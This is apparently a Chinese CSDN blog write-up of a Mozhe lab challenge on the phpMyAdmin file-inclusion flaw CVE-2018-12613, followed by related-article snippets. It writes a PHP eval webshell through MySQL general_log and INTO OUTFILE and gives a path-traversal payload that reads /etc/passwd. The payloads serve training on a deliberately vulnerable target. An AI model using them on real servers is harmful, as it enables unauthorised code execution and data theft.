墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

最新推荐文章于 2023-12-12 00:52:29 发布
最新推荐文章于 2023-12-12 00:52:29 发布
阅读量5.2k 收藏 15
点赞数 5
分类专栏: CTF小白 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45736958/article/details/117928941
版权
本文详细介绍了两种利用phpMyAdmin后台文件包含漏洞(CVE-2018-12613)的方法。首先,通过burp爆破获取账号密码,接着利用MySQL的导入导出功能写入文件,通过访问写入的日志文件和into outfile写入木马。其次,分析index.php和Core.php源码,发现并利用checkPageValidity函数中的白名单绕过,成功读取根目录的key.txt文件。
摘要由CSDN通过智能技术生成

phpMyAdmin

第一种:

一、利用burp爆破出账号密码

image-20210615143749593

image-20210615143707494

二、尝试写马连入蚁剑
1.发现MySQL对导入导出没做任何限制
secure_file_priv为null    	表示不允许导入导出
secure_file_priv			指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv			没有设置时,则表示没有任何限制

image-20210615145040648

2.查询日志
show variables like 'general_log%'

image-20210615145329861

3.利用日志写文件
开启general_log:  set global general_log=ON

image-20210615145952653

image-20210615150024774

设置日志写入文件
SET global general_log_file='/var/www/html/cao.php'

image-20210615150945041

4.访问写入的日志文件

image-20210615151422283

6.尝试直接通过into outfile写入一句话木马
select '<?php eval($_REQUEST[cao]); ?>' into outfile '/var/www/html/cao2.php'

image-20210615151703267

7.访问phpinfo文件,并连接蚁剑得到key值
http://219.153.49.228:42067/cao2.php?cao=phpinfo();

image-20210615151811271

在根目录发现key值

image-20210615154822992

第二种:

漏洞详情:

关于漏洞分析可以查看这篇文章CVE-2018-12613phpMyAdmin 后台文件包含漏洞分析

一、下载index.php文件进行分析

image-20210615155927698

1.发现55到63行存在问题
$target_blacklist
最低0.47元/天 解锁文章
曹振国cc
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1477
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1481
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1327
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
phpMyAdmin后台文件包含分析溯源CVE-2018-12613)--墨者学院
小白鸽
08-03 766
01 背景介绍 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 02 影响版本 phpMyAdmin 4.8.0和4.8.1 03 利用方式 1.写phpinfo文件,利用文件包含,查看绝对路径, select '<?php phpinfo()?>' 2.写小马 select '<?ph
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 511
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者靶场练习——phpMyAdmin后台文件包含分析溯源
最新发布
weixin_63082823的博客
12-12 557
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1323
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 863
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1445
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 1996
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
CVE-2018-12613(远程文件包含)
weixin_59872639的博客
03-01 252
受影响版本 phpMyAdmin 4.8.0和4.8.1 环境 Vulhub - Docker-Compose file for vulnerability environment 漏洞利用 ?target=db_sql.php%253f/../../../../../../../../etc/passwd 因为`%253f`二次url解码后是`?`,整体变成 ?target=db_sql.php?/../../../../../../../../etc/passwd ...
CVE-2018-12613(远程文件包含
weixin_30908941的博客
08-07 317
问题在index.php的55~63行 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_m...
CVE-2018-12613复现
0xdawn的博客
01-31 4633
0x00 漏洞描述 ​ 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ ...
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值